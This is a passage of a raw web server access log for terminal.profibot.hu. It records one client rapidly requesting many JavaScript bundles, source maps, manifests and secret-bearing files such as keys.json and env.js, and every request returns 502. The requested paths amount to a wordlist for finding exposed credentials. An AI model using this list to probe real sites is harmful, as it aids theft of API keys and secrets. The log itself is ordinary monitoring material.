terminal.profibot.hu "/.vite/manifest.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/app/entry.client.tsx" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/main.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/index.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/config" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_astro/page.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/static/js/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/bundle.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/payment.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_nuxt/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/api/config" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/config/keys.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/config/index.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/main.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/vite.config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/asset-manifest.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/_buildManifest.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/js/app.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/src/env.d.ts" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/window.env.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_astro/hoisted.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/assets/index.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/_app.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/assets/js/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/js/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/lib/config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.chunk.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_app/immutable/chunks/singletons.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/bundle.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/asset-manifest.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_app/immutable/chunks/index.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/keys.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/js/main.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/1.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/index.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/bundle.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/public/js/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/src/env.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/workbox.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/api.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/.astro/types.d.ts" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_nuxt/vendors.app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/vendor.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/__env.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/solid.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/root.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/.cache/page-ssr/routes/render-page.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/bundle.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_nuxt/vendors.app.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/config.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/bundle.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/cart" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/static/js/bundle.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/public/build/manifest.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/app/root.tsx" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/public/build/entry.client.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/0.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/sw.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/settings.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/assets/index.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/public/js/bundle.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/env.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/runtime-config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/env.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/public/build/root.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_app/env.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/.vite/manifest.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/runtime-main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/main.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/index.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/subscribe" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/4.chunk.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/_app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/js/config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/q-manifest.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/chunk.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/bundle.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/assets/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/page-data/app-data.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/assets/main.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/app.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_app/immutable/entry/start.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_astro/client.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/webpack.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/.svelte-kit/output/client/_app/env.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/stripe.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/keys.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/client.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/vendor.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/service-worker.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/src/env.d.ts" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/__ENV.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_nuxt/config.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/app.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/development/pages/_app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_nuxt/app.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/main.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/runtime.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/webpack.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/dist/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/runtime.js.map" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/constants.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/build/bundle.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/main.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 